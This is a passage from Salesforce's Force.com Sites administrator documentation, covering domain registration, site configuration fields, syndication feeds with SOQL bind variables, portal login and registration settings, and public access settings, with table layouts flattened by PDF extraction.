With Force.com sites, you no longer have to do any of those things. Force.com Sites enables you to create public websites and
applications that are directly integrated with your Salesforce organization—without requiring users to log in with a username
and password. You can publicly expose any information stored in your organization through a branded URL of your choice.
You can also make the site's pages match the look and feel of your company's brand. Because sites are hosted on Force.com
servers, there are no data integration issues. And because sites are built on native Visualforce pages, data validation on collected
information is performed automatically. You can also enable users to register for or log in to an associated portal seamlessly
from your public site.

Note: Force.com Sites is subject to these additional Terms of Use.

For information on Site.com, which is a Web content management system (CMS) that makes it easy to build dynamic,
data-driven Web pages and edit content in real time, see Site.com Overview on page 3279.

The following examples illustrate a few ways that you can use sites:

• Create an ideas site—Use sites to host a public community forum for sharing and voting on ideas about your company,
services, or products. Ideas websites can be made public using sites.

• Publish a support FAQ—Provide helpful information on a public website where customers can search for solutions to
their issues.

• Create a store locator tool—Add a public tool to your portal that helps customers find stores in their area.

• Publish an employee directory—Add an employee directory to your company's intranet by creating a site restricted by IP
range.

• Create a recruiting website—Post job openings to a public site and allow visitors to submit applications and resumes online.

• Publish a catalog of products—List all of your company's products on a public website, with model numbers, current prices,
and product images pulled dynamically from your organization.

Because Force.com sites are served directly from the Salesforce organization, a site's availability is directly related to the
organization's availability. During your organization's maintenance window for major releases, your sites will be unavailable;
users who try to access a site will see a Force.com-branded maintenance page or your custom Service Not Available Page. It's
a good idea to inform your site users of the release maintenance windows and related sites unavailability in advance. You can
view specific maintenance windows, listed by instance, at trust.salesforce.com/trust/status/#maint.
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The Force.com Domain

For each of your sites, you determine the URL of the site by establishing the site's domain name. You can choose one of the
following domain options:

• Use your Force.com domain name, which is your unique subdomain prefix plus force.com. For example, if you choose
mycompany as your subdomain prefix, your domain name would be http://mycompany.force.com. The name is
case sensitive.

Note:  Your Force.com domain name is used for all the sites that you create. For example, your company could
create one public site for partners, another for developers, and a third for support. If your company's domain is
http://mycompany.force.com, those three sites might have the following URLs:

◊ http://mycompany.force.com/partners

◊ http://mycompany.force.com/developers

◊ http://mycompany.force.com/support

• Create a branded, custom Web address, such as http://www.mycompanyideas.com, by registering through a domain
name registrar. Create CNAME records to redirect your branded domain and subdomains to your Force.com domain
without exposing the force.com name in the URL. It can take up to 48 hours for your Force.com domain to become
available on the Internet. Custom Web addresses aren't supported for sandbox or Developer Edition organizations.

Note: The format of the secure URLs for your Force.com sites depends on the organization type or Edition. Your
unique subdomain prefix is listed first, followed by Edition or environment type, then instance name and the force.com
suffix. In the following examples, the subdomain prefix is “mycompany,” the sandbox name is “mysandbox,” the
instance name is “na1,” and the sandbox instance name is “cs1”:

Secure URLOrganization Type

https://mycompany-developer-edition.na1.force.comDeveloper Edition

https://mycompany.mysandbox.cs1.force.comSandbox

https://mycompany.secure.force.comProduction

The subdomain prefix for Developer Edition is limited to 22 characters. The secure URL is displayed on the Login
Settings page. The URL is case sensitive.

See Also:
Setting Up Force.com Sites
Managing Force.com Sites
Force.com Sites Limits and Billing
Administrator setup guide: Force.com Sites Implementation Guide
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Managing Force.com Sites
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

To get started using Force.com sites, from Setup, click Develop > Sites. From this page, you can:

• Register your Force.com domain, if you have not yet done so.

• View all sites hosted on your Force.com domain.

• Click New to create a new site.

• Click Edit to make changes to an existing site.

• Click Activate or Deactivate to change the active status for your site.

Warning:  Be careful not to expose any information that you do not want to make public.

• Click the site's label to view that site's details.

• Click the site's URL to open that site in a browser.

See Also:
Setting Up Force.com Sites
Creating and Editing Force.com Sites
Configuring Force.com Sites

Registering a Custom Force.com Domain
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Your company's Force.com domain is used for all the sites that you create. Even if you register a branded Web address for
your site, you must choose a Force.com domain. The branded URL will be redirected to the Force.com domain.

Note: If you choose to create a branded top-level domain or subdomain through a domain name registrar, the
CNAME record that you provide to that registrar must be your Force.com domain name and not the site URL. For

3432

Managing Force.com SitesForce.com Sites



example, if you entered www.mycompany.com when registering your domain, the CNAME must be
www.mycompany.com.live.siteforce.com.

To register your Force.com domain:

1. From Setup, click Develop > Sites.
2. Enter a unique name for your Force.com domain. A Force.com domain name can contain only alphanumeric characters

and hyphens, and must be unique in your organization. It must begin with a letter, not include spaces, not end in a hyphen,
and not contain underscores or periods. Salesforce.com recommends using your company's name or a variation, such as
mycompany.

Warning:  You can't modify your Force.com domain name after you have registered it.

3. Click Check Availability to confirm that the domain name you entered is unique. If it isn't unique, you are prompted to
change it.

4. Read and accept the Sites Terms of Use by selecting the checkbox.
5. Click Register My Force.com Domain. After you accept the Terms of Use and register your Force.com domain, the

changes related to site creation are tracked in your organization's Setup Audit Trail and the Site History related list. It
may take up to 48 hours for your registration to take effect.

Note: The format of the secure URLs for your Force.com sites depends on the organization type or Edition. Your
unique subdomain prefix is listed first, followed by Edition or environment type, then instance name and the force.com
suffix. In the following examples, the subdomain prefix is “mycompany,” the sandbox name is “mysandbox,” the
instance name is “na1,” and the sandbox instance name is “cs1”:

Secure URLOrganization Type

https://mycompany-developer-edition.na1.force.comDeveloper Edition

https://mycompany.mysandbox.cs1.force.comSandbox

https://mycompany.secure.force.comProduction

The subdomain prefix for Developer Edition is limited to 22 characters. The secure URL is displayed on the Login
Settings page. The URL is case sensitive.

See Also:
Setting Up Force.com Sites
Force.com Sites Considerations
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CREATE A FORCE.COM SITE

Setting Up Force.com Sites
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

“Manage Users”To edit public access settings for Force.com sites:

Force.com Sites enables you to create public websites and applications that are directly integrated with your Salesforce
organization—without requiring users to log in with a username and password.

To set up a Force.com site:

1. From Setup, click Develop > Sites.
2. Register a custom Force.com domain for your organization.
3. Create and configure your site.
4. Develop and use Visualforce pages for your site, use or hide standard pages, and customize or replace out-of-box error

pages. Associate these pages with your site.
5. Choose a site template. Use the lookup field to find and select a template that you’ve developed, or use the out-of-box

template provided. The site template provides the page layout and stylesheet for your site and overrides any formatting
inherited from the associated portal.

6. Enable a portal for login or self-registration, then associate it with your site.
7. Optionally, modify public access settings.
8. When you are ready to make your site public, click Activate on the Site Details page. You can also activate your site from

the Site Edit and Sites pages.

After you have set up a site, you can:

• Run reports and dashboards on your site.

• Create workflow rules that trigger email alerts when site-related criteria are met.

See Also:
Managing Force.com Sites
Configuring Force.com Sites
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Creating and Editing Force.com Sites
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

After registering your Force.com domain, create a Force.com site using the following steps:

1. From Setup, click Develop > Sites.
2. Click New or click Edit for an existing site.
3. On the Site Edit page, define the following:

DescriptionField

The name of the site as it appears in the user interface.Site Label

The name used when referencing the site in the SOAP API. This name can
contain only underscores and alphanumeric characters, and must be unique in

Site Name

your organization. It must begin with a letter, not include spaces, not end with
an underscore, and not contain two consecutive underscores.

An optional description of the site.Site Description

The user who will receive site-related communications from the site’s visitors
and salesforce.com.

Site Contact

The unique Force.com URL for this site. Force.com provides the first part of
the URL based on the domain name that you registered; you must add a unique

Default Web Address

site name to the end. Unless you configure a custom Web address through a
domain name registrar, this is the URL that the public will use to access your
site.

The unique Force.com URL for this site when using SSL. The secure Web
address is used for SSL even if you defined a custom Web address.

Secure Web Address

The optional branded custom Web address that you registered with a third-party
domain name registrar. The custom Web address acts as an alias to your
Force.com address.

To enable a custom Web address, create a CNAME record to your Force.com
domain with that registrar. If you have not registered this address, you encounter

Custom Web Address

an error. Custom Web addresses aren't supported for sandbox or Developer
Edition organizations.

Note: If you choose to create a branded top-level domain or subdomain
through a domain name registrar, the CNAME record that you provide
to that registrar must be your Force.com domain name and not the site
URL. For example, if you entered www.mycompany.com when
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DescriptionField

registering your domain, the CNAME must be
www.mycompany.com.live.siteforce.com.

The option that activates your site when you are ready to make it available to the
public. You can also activate your site from the Sites and Site Details pages.

Active

When the site is inactive, users will see the page specified in the Inactive
Site Home Page field.

The landing page that users are directed to when this site is active. Use the lookup
field to find and select the Visualforce page that you developed for your site’s

Active Site Home Page

home page. Choose the UnderConstruction page if you just want to test your
site.

For ideas sites, you must use the IdeasHome page and for answers sites you must
use the AnswersHome page. The “look and feel” for your Ideas site or Answers
site will be inherited from its associated portal unless you select a site template.

If you deployed a site before the Summer ’10 release, you can set AnswersHome
as your default landing page if you create a Visualforce page using <apex:page
action="{!URLFOR('/answers/answersHome.apexp')}"/>

The landing page that users are directed to when this site is inactive. Use the
lookup field to find and select the page that you want to use. You can, for example,

Inactive Site Home Page

select a page to indicate that the site is under construction or down for
maintenance.

The template that provides the page layout and stylesheet for your site. The site
template overrides any formatting inherited from the associated portal. Use the

Site Template

lookup field to find and select a template that you’ve developed, or use the
out-of-box template provided.

Note:  The site template specified here is used only for Visualforce pages
using the $Site.Template expression.

A file that determines which parts of your public site Web spiders and other
Web robots can access. Web robots are often used by search engines to categorize

Site Robots.txt

and archive websites. HTML tags are not allowed, as they are not compatible
with robots.txt spiders. For Visualforce pages, add
contentType="text/plain" to the <apex:page> tag.

Example disallowing all robots from indexing all pages:

<apex:page contentType="text/plain">
User-agent: * # Applies to all robots
Disallow: / # Disallow indexing of all pages
</apex:page>
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DescriptionField

Example allowing all robots to index all pages:

<apex:page contentType="text/plain">
User-agent: * # Applies to all robots
Disallow: # Allow indexing of all pages
</apex:page>

The icon that appears in the browser’s address field when visiting the site. Use
this field to set the favorite icon for your entire site instead of for each page.

Site Favorite Icon

Changes will be reflected on your site one day after you make them, due to
caching.

The tracking code associated with your site. This code can be used by services
like Google Analytics to track page request data for your site.

Analytics Tracking Code

An Apex class to use for rewriting URLs for your site, from Salesforce URLs to
user-friendly URLs. With this class, you can make rules to rewrite site URL

URL Rewriter Class

requests typed into the address bar, launched from bookmarks, or linked from
external websites. You can also create rules to rewrite the URLs for links within
site pages.

The option that displays the Syndication Feeds related list, where you can create
and manage syndication feeds for users on your public sites. This field is visible
only if you have the feature enabled for your organization.

Enable Feeds

4. Click Save.

See Also:
Setting Up Force.com Sites
Configuring Force.com Sites
Force.com Sites-Related Apex Methods and Expressions

Configuring Force.com Sites
Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

“Manage Users”To edit public access settings for Force.com sites:

Once you have created your site, you can configure it on the Site Details page. To access this page, from Setup, click Develop
> Sites, and then in the Sites list, click the site name. You can do the following:
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• Click Edit to make changes to the site.

• Click Public Access Settings to view or edit the security settings, including permissions, page layouts, and more.

• Click Login Settings to configure the login and registration settings for your site. Built-in login and registration logic
allows users to quickly register for, and seamlessly log in to, your portal from your public site.

• Click URL Redirects to see any page redirects you've set up for your site.

• Click Activate or Deactivate to change the active status for your site.

Warning:  Be careful not to expose any information that you do not want to make public.

• Click Preview as Admin to view your site in administrator preview mode. Administrator preview mode shows the errors
on each site page in context and in greater detail, so you can more easily troubleshoot site issues.

Note: This feature does not appear for community organizations.

• Click Edit in the Site Visualforce Pages or Site Standard Pages related lists to select the pages available for your site. All
pages associated with the site must be enabled.

• Click Page Assignment to assign error pages for standard errors, such as “Authorization Required (401)” and “Page Not
Found (404).” You can override or edit the default pages that are provided.

• Click New in the Feeds related list to create a new syndication feed. You must click Enable Feeds in the Site Detail list
to display this related list.

• View the 24-Hour Usage History related list to see current bandwidth and service request time usage, the daily limits, and
the percentage used.

• View the Site History related list to see the configuration changes that have been tracked for your site.

See Also:
Assigning Force.com Site Error Pages
Public Access Settings for Force.com Sites
Managing Force.com Site Login and Registration Settings

Defining Syndication Feeds

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Modify All Data”Create, edit, or delete a feed definition:

No special user permission requiredSubscribe to a feed

Syndication feeds give users the ability to subscribe to changes within Force.com sites and receive updates in external news
readers. Simply by defining a SOQL query and mapping, you can syndicate changes to public data to your end users. You can
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create one or more syndication feeds for your organization's public sites or any Visualforce page. The syndication feed displays
the records specified by a SOQL query. Users can subscribe to the feed and view the feed when they visit the site or page.

Define a syndication feed, including what records are returned, and which data from the records is displayed:

Name

A descriptive name for this feed, which distinguishes it from other feeds you may create. Use only letters, numbers, or
the underscore character “_”. Do not use more than one underscore character in a row.

Description

Describe the feed. For example, “Account first name, last name, and region for the last ten accounts created or edited.”

Query

The SOQL query that defines which records are returned to the syndication feed. To ensure fast performance, some
limitations on the SOQL query are imposed:
• If the SOQL query does not specify a limit, then no more than 20 records are returned.

• Query limits can't exceed 200 results. If you make a query with a limit beyond this number, only the first 200 records
are returned.

• If the SOQL query does not have an ORDER BY value specified, records are ordered by the LastModifiedDate
value if there is one, or by SystemModstamp value if not

• COUNT is not supported.

• Aggregate queries are not supported. For example, this query cannot be used in a syndication feeds SOQL query:

SELECT Name, (SELECT CreatedBy.Name FROM Notes) FROM Account

• You can use bind variables, a variable whose value is supplied in the URL. For more information, see Using Bind
Variables for Queries and Mapping on page 3441.

Note:  The guest user must have appropriate sharing and field-level security access or you cannot save your
query, because the Force.com platform verifies access and sharing before saving.

Mapping

Because syndication feeds use the ATOM web publishing protocol, you must provide a mapping value that matches
objects and fields on the returned records with ATOM constructs. Note that all values must be string literals. For more
information about mapping elements, see ATOM-Object Mapping on page 3440.

You can use bind variables, a variable whose value is supplied in the URL. For more information, see Using Bind Variables
for Queries and Mapping on page 3441.

Max Cache Age Seconds

Because many users may access a feed at the same time, Salesforce caches the feed data, for 3600 seconds by default.
You can modify this to a minimum of 300 seconds, or for as long as you wish. Query results that are older than the time
specified here are dropped, and a new query is run on the next request for that information, that is, the next time a user
opens a page containing a feed that they have subscribed to.

Active

Select this checkbox to make the feed available for subscription. Once a feed is active, users have the option of subscribing
to it.
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ATOM-Object Mapping

You must specify a mapping in the syndication feed definition. The mapping relates ATOM constructs such as entry title to
the corresponding value in a record, for example, “Account Name.” A full set of mappings represents a news feed, and the
query represents the content of each news item in a feed. For example, Lead records created today or Contacts with updated
Account information.

A feed element is the envelope for each part of a news item, and an entry element is the contents of the envelope.

Mapping also allows you to apply short labels to various fields for display purposes.

The following table lists each ATOM and object element and explains what values should be provided:

DescriptionEntry ElementFeed Element

Required only if ea (entry author) is not specified. Feed author. For example, fa:"Acme
Feed Author Admin Mary" shows the feed author as Admin Mary.

fa

Optional (because default value is supplied). Id of the feed. By default, this value is the
public site URL. If you specify a value, it must be a valid internationalized resource
identifier (IRI). An IRI is a URL generalized to allow the use of Unicode.

fid

Optional (because default value is supplied). Feed link. For example,
fl:"http://www.salesforce.com". News readers usually interpret this element
by linking the feed title to this URL.

fl

Optional. Feed subtitle. For example, &map=ft:"Newest
Opportunities",fst:"Western Division" shows the feed title Newest
Opportunities and subtitle Western Division.

fst

Required. Feed title. For example, ft:"Newest Opportunities".ft

Required only if fa (feed author) is not specified. Entry author. For example,
ea:"Account created by: " + Account.CreatedBy .

ea

Required. Entry content. For example,ec:"description for " Name "<br>"
Description shows the value of the Name field with additional text. The output of a
feed for this example resembles the following:

description for Ajax Industries Description

ec

Optional. Entry content of type text, html, or xhtml. For example, ect: html for
HTML content. Default is text.

ect

Optional. Entry link. Must be a valid URI. This value is usually a link to another
representation of the content for the entry. For example, the link could be to a record in

el

the Salesforce user interface. News readers usually interpret this element by linking the
entry title to this URL For example, el:"Account.URl".

Optional. Entry summary. An optional summary of the entry content. For example, et:
Account.Name, es: Account.Name + "’s account number, website,

es

and description", ec: Account.AccountNumber + " " +
Account.Website + “ “ + Account.Description

If not specified, news readers display the content defined using the ec element.

Optional. Entry summary of type text, html, or xhtml. For example, est: html for
HTML content. Default is text. Do not specify a value unless es has been specified.

est
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DescriptionEntry ElementFeed Element

Required. Entry title, a field name. For example, et:Name.et

Optional. By default, the required ATOM element <updated> value is automatically
provided by the LastModifedDate of the main entity being queried; usually the object

eu

in the main FROM clause of the SOQL query. This value indicates the last time an entry
or feed was modified. If you wish to change this default behavior, you can specify a
different object or field's LastModifedDate be used. For example:
• Query: SELECT Id, Name, MyDate__c FROM AccountMapping Parameter:

eu: MyDate__c

• Query: SELECT Id, Lastname, Account.LastMOdifiedDate FROM
ContactMapping Parameter: eu: Account.LastModifiedDate

The following example shows a valid mapping values for a syndication feed:

ft: "Harry Potter", et: Name, ec: "description for " Name "<br>" Description, el: "/" Id,
ect: html

Feeds are displayed in the guest user context of the public site where they are displayed. Therefore, if you have used custom
labels to manage internationalization, and specified labels in your mapping, users see those labels displayed in the language of
the guest user. For more information, see Custom Labels and Feeds on page 3442.

You can only use string literals in feed mapping. You cannot use, for example, date literals such as TODAY or LAST_WEEK.

After you have defined a feed, you should test it, and then make the feed active by selecting the Active checkbox as described
above. For more information about testing, see Testing Syndication Feeds on page 3445.

Using Bind Variables for Queries and Mapping

You can use bind variables in the WHERE clause of the SOQL query. Bind variables must be in the following form:

{!var_name}

The following query uses a bind variable named accountID.

SELECT Name, Description
FROM Account
WHERE Id = {!accountID}

Note that this is not the literal name of the field, but an arbitrary name. At run time, the value for accountID is passed to
the query from the URL. This feed is accessed from the following URL and passes in the account ID as part of the query
string parameter:

site_URL/services/xml/My'Account'Feed?accountId=0013000000BmP4x

You can also use bind variables for mapping values.

The following implementation details apply to the use of bind variables for queries:

• You cannot use more than 20 bind variables in a feed definition, queries and mapping combined.
• The bind variable name cannot be more than 100 characters.
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• You can use a bind variable only on the right side of a filter operation to represent part of a string. Because it represents
part of a string, it must be in quotes. For example, the following is a valid query:

SELECT Id, Name FROM Account WHERE Name = '{!myBindVariable}'

The following queries are not valid, because the bind variable is not in a valid position, and is not functioning as the variable
for a literal string:

SELECT Id, Name FROM Account WHERE {!myFieldName} = 'Joe'
SELECT Id, {!myFieldName} FROM Account WHERE IsDeleted = false

• You cannot use a bind variable to represent a field name. This means a bind variable cannot be use on the left side of a
filter operation.

• You cannot use a bind variable to change the meaning or structure of a query for security reasons. Any special characters
you specify in the bind replacement value are interpreted as literal characters when the query is evaluated.

Custom Labels and Feeds

For feeds that need to be localized into different languages, you can use custom labels to define the string in multiple languages.
Then in the mapping definition, you simply refer to the custom label. When a request comes in, the custom label inspects the
guest user language and returns the translated text, which is used in the mapping.

Custom labels can be specified in a field with the following syntax:

map_element_name: "{!$LABEL.custom_label_name}"

Use the following procedure to specify a custom label in a feed:

1. From Setup, click Create > Custom Labels. You may wish to name the custom label after the mapping element that takes
its value, for example feedTitle for the ft element.

2. Enter the values for all supported languages.
3. Specify the custom label in the feed mapping.

For example, assume that you create a feed containing information on all the houses your company is trying to sell. For English
users, the title of the feed should be “The Houses,” but for Spanish users, the title of the feed should be “Las Casas.” You
would create a custom label, for example, feedTitle. In English, its value is “The Houses,” and the Spanish value is “Las
Casas.” Then, in the feed mapping definition, specify the following for the feed title fc::

ft: "{!$LABEL.feedTitle}"

Visualforce and Feeds

To add a feed to a Visualforce page, use the Visualforce standard HTML features. For example, assuming the Visualforce
page is located in the base directory of the site, it can contain a tag like the following:

<A HREF=""/services/xml/theFeedName">My feed</A>

The text My feed links to the feed.

If you want to link the feed from an image, include an inline image tag similar to the following:

<A HREF="/services/xml/theFeedName"><img src="feed.gif"></A>

You must upload your own image.
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To add the icon to the address bar, add the link tag to the <head> tag of the Visualforce page:

<link href='URI of feed'
type='application/x.atom+xml'
rel='feed'
title='A nice descriptive title'/>

See Also:
About Syndication Feeds
Testing Syndication Feeds

About Syndication Feeds

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Modify All Data”Create, edit, or delete a feed definition:

No special user permission requiredSubscribe to a feed

Syndication feeds give users the ability to subscribe to changes within Force.com sites and receive updates in external news
readers. Simply by defining a SOQL query and mapping, you can syndicate changes to public data to your end users. You can
create one or more syndication feeds for your organization's public sites or any Visualforce page. The syndication feed displays
the records specified by a SOQL query. Users can subscribe to the feed and view the feed when they visit the site or page.

Validating Feeds Security

When a user subscribes to a feed, the information is run in a guest user context. This means that you must ensure the guest
user has access to all and only the records appropriate for a guest use before defining any queries.

To validate feeds security:

• Edit the public access setting for the site to make sure the guest user has the correct object permissions and field-level
security settings.

• Create sharing rules to control which records the guest user has access to.

After adjusting public access and field-level security settings to ensure the objects you wish to include in a feed are available
to the guest user, perform any of the following feeds-related tasks:

• To create a new feed, click New.

• To view the definition of an existing feed, click the feed name.

• To edit an existing feed, click Edit.
• To delete an existing feed, click Delete.
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• To test the validity of a feed, click Run Test. If any errors exist in the query definition or mapping, error messages are
displayed.

See Also:
Defining Syndication Feeds
Testing Syndication Feeds

Viewing Syndication Feeds

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Modify All Data”Create, edit, or delete a feed definition:

No special user permission requiredSubscribe to a feed

View the syndication feed definition, including what records are returned, and which data from the records is displayed:

Name

A descriptive name for this feed, which distinguishes it from other feeds you may create.

Description

Describes the feed. For example, “Account first name, last name, and region for the last ten accounts created or edited.”

Query

The SOQL query that defines which records are returned to the syndication feed. To ensure fast performance, some
limitations on the SOQL query are imposed. For more information, see Defining Syndication Feeds on page 3438.

Mapping

Because syndication feeds use the ATOM web publishing protocol, you must provide a mapping value that matches
objects and fields on the returned records with ATOM constructs. Note that all values must be string literals. For more
information about mapping elements, see Defining Syndication Feeds on page 3438.

Max Cache Age Seconds

Because many users may access a feed at the same time, Salesforce caches the feed data, for 3600 seconds by default.
This value can be a minimum of 300 seconds, or for as long as you wish. Query results that are older than the time
specified here are dropped, and a new query is run on the next request for that information, that is, the next time a user
opens a page containing a feed that they have subscribed to.
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Active

This checkbox indicates whether the feed is available for subscription. Once a feed is active, users have the option of
subscribing to it.

See Also:
About Syndication Feeds
Testing Syndication Feeds

Testing Syndication Feeds

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Modify All Data”Create, edit, or delete a feed definition:

No special user permission requiredSubscribe to a feed

Test the feed definition you have created before enabling it for customers.

To test a feed:

1. After creating a feed, from Setup, click Sites and click the site for which you've defined the feed. Alternatively, you can
navigate to the feed detail page any number of ways, including clicking the feed name from the site detail page.

2. Click Preview for the feed you wish to test.
3. If one or more bind variables have been used in the feed, a dialog appears. Enter a test value for each bind variable.
4. A dialog appears allowing you to create a bookmark for the feed with the bind variable values you specified. You can save

the bookmark, or cancel the dialog.
5. The values returned by your feed are displayed. Verify that the results are what you expected.

See Also:
Defining Syndication Feeds
About Syndication Feeds
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Managing Force.com Site Login and Registration Settings

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Use login settings if you want to let users register for and log in to your portal from your public Force.com site. For example,
users browsing through an ideas site can register and login directly from that site, and as authenticated users, they can then
vote, add comments, and participate in the ideas community. When users successfully log in, they leave the public site and
enter the associated portal seamlessly.

Note: Only Customer Portals can be used for self-registration. Partner portals do not support self-registration.

The Authenticated Website high-volume portal user license is specifically designed to be used with Force.com sites.
Because it's designed for high volumes, it should be a cost-effective option to use with Force.com sites.

Force.com sites provides built-in registration and login logic. Default Force.com-branded Visualforce pages are associated
with registration, login, forgot password, and password changes. You can modify these pages or replace them with your own.

The following login, and registration pages are provided by default:

DescriptionPage Name

Default login page. Used to log users in to the associated portal
from your Force.com site.

SiteLogin

Default registration page. Used to register new users for the
associated Customer Portal from your Force.com site.

SiteRegister

Default registration confirmation page. The page that users
see on successful registration to the associated Customer
Portal.

SiteRegisterConfirm

Note:  The login and registration forms must be secure. Set the forceSSL attribute to true for these forms. However,
salesforce.com recommends that you set forceSSL to false for forms accessed by users who have already been
authenticated, such as portal users. Since the forceSSL attribute forces a redirect to a secure URL, authenticated
users would encounter an error.

The built-in login process:

• Checks to see whether the site is enabled for logins

• Checks to see whether the user is a valid user for the site

• Allows users to reset expired passwords

The built-in registration process:

• Checks new user information against existing users for the Customer Portal associated with the site
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• Checks to see if a contact already exists for the new user

• Creates a new contact, if one doesn't already exist, and associates it with the account for the site.

Important:  You must update the SiteRegisterController with the Account ID using the following steps:

1. From Setup, click Develop > Apex Classes.
2. Click Edit next to SiteRegisterController.
3. Find the private static Id PORTAL_ACCOUNT_ID = '<Account_ID>'; line and insert the ID for

the account that you want to associate with new users. The line should look similar to this:

private static Id PORTAL_ACCOUNT_ID = '001DoooooolQpyk';

4. Click Save.

• Enables the Customer Portal for the new user and sends an email confirmation message

• Optionally, allows users to create passwords on the registration page, avoiding the standard email confirmation process

Note: You can create and enable a person account as a Customer Portal user using the
createPersonAccountPortalUserApex method. Use createPersonAccountPortalUser to create a person
account using either the default record type defined on the guest user's profile or a specified record type, then enable
it for the site's portal. Person Accounts can only be enabled as high-volume portal users.

To enable public login and registration for your portal:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to control.
3. Click Login Settings.
4. Click Edit.
5. From the Enable Login For list, select a portal to associate with your site. The portal you choose must have the Login

Enabled option selected. For Customer Portals, you must also select the Self-Registration Enabled option.
Force.com Sites leverages the following portal settings:

• Logout URL is used if you want to take users to a specific page on logout. If this value is left blank, users are taken to
the page specified in the Active Site Home Page field for your site.

• Lost Password Template is used for the forgot password process.
• Header, Footer, Logo, and Login Message are used for the look and feel on IdeasHome and AnswersHome pages.
• For Customer Portals:

◊ New User Template is used on self-registration if a password is not provided.
◊ Default New User License, Default New User Role, and Default New User Profile are used for

self-registration.

6. Select a Change Password Page. A default page is provided, but you can select your own page instead, using the lookup
field.

7. Select Require Non-Secure Connections (HTTP) to override your organization's security settings and exclusively
use HTTP when logging in to the portal from your site. If this checkbox is not selected, the Require Secure
Connections (HTTPS) setting under Setup, in Security Controls > Session Settings, determines the security level.

The following table illustrates the relationship between these settings.

3447

Configuring Force.com SitesCreating Websites



DescriptionOrganization-Level Security: Require
Secure Connections (HTTPS)

Site-Level Security: Require
Non-Secure Connections (HTTP)

Not checkedNot checked • Organization can use either HTTP
or HTTPS

• Site uses HTTP for the post-login
session

Not checkedChecked • Organization can use either HTTP
or HTTPS

• Site uses HTTP for the post-login
session

CheckedNot checked • Organization uses only HTTPS
• Site uses HTTPS for the post-login

session
• Upon login, users see the

secure.force.com domain

CheckedChecked • Organization uses only HTTPS
• Site uses HTTP for the post-login

session

Warning: If the Require Secure Connections (HTTPS) checkbox on the Session Settings page is selected,
and the Require Non-Secure Connections (HTTP) checkbox on the Login Settings page is not selected,
users logging in to the associated portal from the site will see the secure.force.com domain. For example, if
you registered mycompany.force.com as your custom domain, the URL changes to
https://mycompany.secure.force.com upon login.

Customers using a script to login to sites can use the optional refURL URL parameter to retain the custom
domain name after login. This parameter has no effect if Require Non-Secure Connections (HTTP) has
been set for the site or Require Secure Connections (HTTPS) has been set for the organization. An
example URL using refURL is:
http://mysite.secure.force.com/SiteLogin?refURL=http://mysite.com.

8. The Secure Web Address field shows the unique Force.com URL for this site when using SSL.
9. Click Save.

You can also enable Sites to use your identity provider for single sign-on.

See Also:
Configuring Force.com Sites
Associating a Portal with Force.com Sites
Force.com Sites-Related Apex Methods and Expressions
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Public Access Settings for Force.com Sites

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

“Manage Users”To edit public access settings for Force.com sites:

Public access settings control what public users can do on each Force.com site. To set the public access settings for your site:

1. From Setup, click Develop > Sites.
2. Click the name of the site you want to control.
3. Click Public Access Settings to open the Profile page for your site profile.

This page includes all the functionality for viewing and editing profile permissions and settings, but you can't clone or delete
the profile.

In the site profile, you can:

• Set the object permissions for your site. You can grant “Read” and “Create” permissions on all standard objects except
products, price books, and ideas; and “Read,” “Create,” “Edit,” and “Delete” on all custom objects. All permissions that
aren't set by default must be set manually.

Warning: We recommend setting the sharing to private for the objects on which you grant “Read” access for
your site. This ensures that users accessing your site can view and edit only the data related to your site.

We also recommend securing the visibility of all list views. Set the visibility of your list views to Visible to
certain groups of users, and specify the groups to share to. List views whose visibility is set to Visible
to all users may be visible to public users of your site. To share a list view with public users, create a new
public group for those users and give them visibility. If the object's sharing is set to private, public users won't be
able to see those records, regardless of list view visibility.

• Control the visibility of custom apps. If you want to expose a custom app and its associated tabs to public users, make only
that app visible and make it the default to avoid exposing other pages. If any of your site pages use standard Salesforce
headers, other visible applications may be seen by public users.

• Set the login hours during which users can access the site.

• Restrict the IP address ranges from which you can access the site. Force.com sites ignore company-wide IP range restrictions
in order to provide public access; however, you can restrict the IP range here.

Note: To set restrictions based on IP or login hours, HTTPS is required. You must use the secure URL associated
with your Force.com domain to access your site.

To enforce HTTPS on all Force.com sites pages and allow all IP addresses to access your site, create the following
IP ranges: 0.0.0.0 to 255.255.255.255, :: to ::fffe:ffff:ffff, and ::1:0:0:0 to
ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff. However, as this may degrade the performance of your
site, don't enforce HTTPS unless it is absolutely required. Changing from HTTP to HTTPS doesn't affect logged
in users until the next time they log in.
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Both IP addresses in a range must be either IPv4 or IPv6. In ranges, IPv4 addresses exist in the IPv4-mapped
IPv6 address space ::ffff:0:0 to ::ffff:ffff:ffff, where ::ffff:0:0 is 0.0.0.0 and
::ffff:ffff:ffff is 255.255.255.255. A range can’t include IP addresses inside of the IPv4-mapped
IPv6 address space if it also includes IP addresses outside of the IPv4-mapped IPv6 address space. Ranges such
as 255.255.255.255 to ::1:0:0:0 or :: to ::1:0:0:0 are not allowed. You can set up IPv6 addresses in
all organizations, but IPv6 is only enabled for login in sandbox organizations from the Spring ’12 release and later.

• Enable Apex controllers and methods for your site. Controllers and methods that are already associated with your site's
Visualforce pages are enabled by default.

• Enable Visualforce pages for your site. Changes made here are reflected on the Site Visualforce Pages related list on the
Site Details page, and vice versa.

See Also:
Configuring Force.com Sites
Force.com Sites-Related Apex Methods and Expressions
Creating Custom List Views

Force.com Sites URL Redirects

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit site URL redirects:

“View Setup”To view site URL redirects:

If you move or reorganize pages on your Force.com site, search engines may have trouble finding the new page locations. To
